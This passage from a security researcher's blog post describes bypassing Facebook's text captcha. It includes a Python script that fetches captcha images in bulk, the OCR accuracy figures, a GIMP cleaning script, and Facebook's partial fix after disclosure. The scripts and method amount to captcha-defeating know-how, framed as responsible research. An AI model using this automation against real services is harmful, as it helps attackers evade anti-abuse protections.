        params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'}
        data = urlencode(params).encode('utf-8')
        request = Request("")
        request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY;;')
        #Send request and analyse response
        f = urlopen(request, data)
        response ='utf-8')
        global ccode
        ccode = re.findall('[a-z0-9-]{43}', response)
        global chash
        chash = re.findall('[a-zA-Z0-9_-]{814}', response)
        print("[+] Parsed response")
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")

def getcaptcha(i):
    try:
        print("[+] Downloading Captcha")
        captchaurl = ""+ccode[0]+"&captcha_challenge_hash="+chash[1]
        #Save the image to disk (the filename scheme here is my own choice)
        urlretrieve(captchaurl, "captcha"+str(i)+".jpg")
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")

print("[+] Start!")
for i in range(0, 1000):
    #Download page and parse data
    getpage()
    #Download captcha image
    getcaptcha(i)
print("[+] Finished!")
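For reference, the parsing in getpage() is nothing clever: re.findall just pulls fixed-width token runs out of the returned HTML. With a made-up 43-character challenge code it behaves like this (the sample string below is fabricated for illustration):

```python
import re

# A fabricated response containing a 43-character [a-z0-9-] challenge code
response = 'captcha_challenge_code="0123456789abcdefghij0123456789abcdefghij-ab" OTHER HTML'
ccode = re.findall('[a-z0-9-]{43}', response)
print(ccode[0])  # -> 0123456789abcdefghij0123456789abcdefghij-ab
```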

Final Results

So I guess you're wondering: how accurate was Tesseract? Well, on a sample of 50 captchas that had been cleaned with Gimp, Tesseract was able to analyse them 100% correctly about 20% of the time. However, taking into account the logic flaws, the actual pass rate jumped to 50%.
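As a rough sanity check on that jump: if the repetition/retry flaws effectively give an attacker around three shots per captcha (my assumption, not a measured figure), a 20% per-attempt rate compounds to roughly the 50% observed:

```python
def overall_rate(p, attempts):
    # Probability that at least one of `attempts` independent tries succeeds
    return 1 - (1 - p) ** attempts

print(round(overall_rate(0.2, 3), 3))  # -> 0.488
```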

Some example results:

It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed. Although you can also see how even subtle changes in the initial image can significantly affect both cleaning output and final analysis.

Facebook Fix #1

After I reported these issues, the captcha repetition was addressed pretty quickly; the other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:

Unfortunately this had little effect on the captcha strength, as it's the thickness of the noise relative to the characters that matters, not the absolute thickness. Making the noise thicker and the characters thinner would have prevented noise removal through selection shrinking.

Final Thoughts

Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% pass rate; I'm sure that with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.

Facebook said that right now the captcha is used more as a mechanism to slow down attacks than to stop them completely. The captcha will eventually be fixed, but there are no concrete plans at the moment.

Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.

Pwndizzle out

#Gimp-Fu cleaning script, based on stackoverflow script here:

from gimpfu import pdb, main, register, PF_STRING

def clean(file):
    #Load image
    image = pdb.gimp_file_load(file, file)
    drawable = pdb.gimp_image_get_active_layer(image)
    #Double image size
    #Select by color black
    #Shrink selection by 1 pixel
    #Grow selection by 2 pixels
    #Fill black
    #Invert selection
    #Fill white
    #Invert selection
    #Translate selection up 4 pixels and paint
    #Translate selection down 10 pixels and paint
    #Resize image
    pdb.gimp_file_save(image, drawable, file, file)

args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)
main()